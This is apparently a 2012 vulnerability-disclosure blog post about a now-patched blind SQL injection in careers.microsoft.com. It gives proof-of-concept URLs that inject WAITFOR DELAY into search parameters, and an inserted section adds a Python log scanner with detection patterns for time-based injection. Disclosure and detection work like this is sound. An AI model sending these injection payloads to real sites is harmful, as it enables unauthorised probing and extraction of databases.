Thursday, July 12, 2012

Microsoft Bug #2: Blind SQL Injection Vulnerability Found in careers.microsoft.com

Description
Sow Ching Shiong, an independent vulnerability researcher, has discovered a Blind SQL Injection vulnerability in careers.microsoft.com that an attacker could exploit to conduct blind SQL injection attacks against the site's backend database.

Proof-of-concept URLs, each of which causes the server's response to be delayed by 25 seconds (the injected WAITFOR DELAY is executed by the database), are provided below:
  • http://careers.microsoft.com/Feed/Search.ashx?ss=xss&jc=all&pr=all&dv=1));WAITFOR DELAY '0:0:25'--&ct=all&rg=all&lang=en
  • http://careers.microsoft.com/Feed/Search.ashx?ss=xss&jc=all&pr=1));WAITFOR DELAY '0:0:25'--&dv=all&ct=all&rg=all&lang=en
  • https://careers.microsoft.com/search.aspx?ss=xss&jc=all&pr=all&dv=1));WAITFOR DELAY '0:0:25'--&ct=all&rg=all&lang=en
  • https://careers.microsoft.com/search.aspx?ss=xss&jc=all&pr=1));WAITFOR DELAY '0:0:25'--&dv=all&ct=all&rg=all&lang=en
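A defender has two pieces of evidence for the issue described above: the delay primitive in the request and the abnormally slow response it produces. As an added example (not from the original post, which contains no code), the following Python scans constructed IIS-style log lines for time-based SQL injection primitives and marks a hit as confirmed only when the response time matches the requested delay; the log format, the 20-second threshold and the sample lines are assumptions.

```python
import re
from urllib.parse import parse_qs

# Constructed IIS W3C-style log lines (date time cs-method cs-uri-stem cs-uri-query
# sc-status time-taken[ms]). Not real server logs; payloads mirror the PoC URLs.
SAMPLE_LOG = """\
2012-07-12 10:00:01 GET /Feed/Search.ashx ss=xss&jc=all&pr=all&dv=1&ct=all&rg=all&lang=en 200 120
2012-07-12 10:00:05 GET /Feed/Search.ashx ss=xss&jc=all&pr=all&dv=1));WAITFOR+DELAY+'0:0:25'--&ct=all&rg=all&lang=en 200 25134
2012-07-12 10:00:31 GET /search.aspx ss=xss&jc=all&pr=1));WAITFOR%20DELAY%20'0:0:25'--&dv=all&ct=all&rg=all&lang=en 200 25088
2012-07-12 10:01:02 GET /search.aspx ss=engineer&jc=all&pr=all&dv=all&ct=all&rg=all&lang=en 200 98
2012-07-12 10:01:10 GET /search.aspx ss=xss&pr=1'+AND+SLEEP(5)--&lang=en 500 4
"""

# Delay primitives used by time-based blind injection on T-SQL, MySQL and PostgreSQL.
TIME_PRIMITIVES = re.compile(
    r"WAITFOR\s+DELAY|SLEEP\s*\(|PG_SLEEP\s*\(|BENCHMARK\s*\(", re.IGNORECASE
)

def scan_line(line, slow_ms=20000):
    """Return (severity, parameter, decoded_value) or None for a benign line.
    'confirmed' means a delay primitive was sent AND the server took at least
    slow_ms to answer, i.e. the database evidently executed the injected delay.
    'probe' means the payload was seen but the response time was normal.
    """
    fields = line.split()
    if len(fields) != 7:
        return None
    query, time_taken = fields[4], int(fields[6])
    # parse_qs decodes both %20 and '+', so the regex sees the SQL as the DB received it.
    for param, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            if TIME_PRIMITIVES.search(value):
                severity = "confirmed" if time_taken >= slow_ms else "probe"
                return severity, param, value
    return None

def scan_log(text, slow_ms=20000):
    """Scan every non-empty line; return a list of (line_no, severity, param, value)."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        hit = scan_line(line, slow_ms) if line.strip() else None
        if hit:
            findings.append((line_no,) + hit)
    return findings

if __name__ == "__main__":
    for line_no, severity, param, value in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {severity:9s} param={param!r} payload={value!r}")
```

The threshold should sit well above the site's normal time-taken but below the delay an attacker requests; a "probe" with a 500 status is still worth triaging, since it shows the injection point is being tested even if the delay did not fire.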

Conclusion
This vulnerability has been confirmed and patched by the Microsoft Security Team. I would like to thank them for their quick response to my report.

Microsoft White Hat

http://technet.microsoft.com/en-us/security/cc308575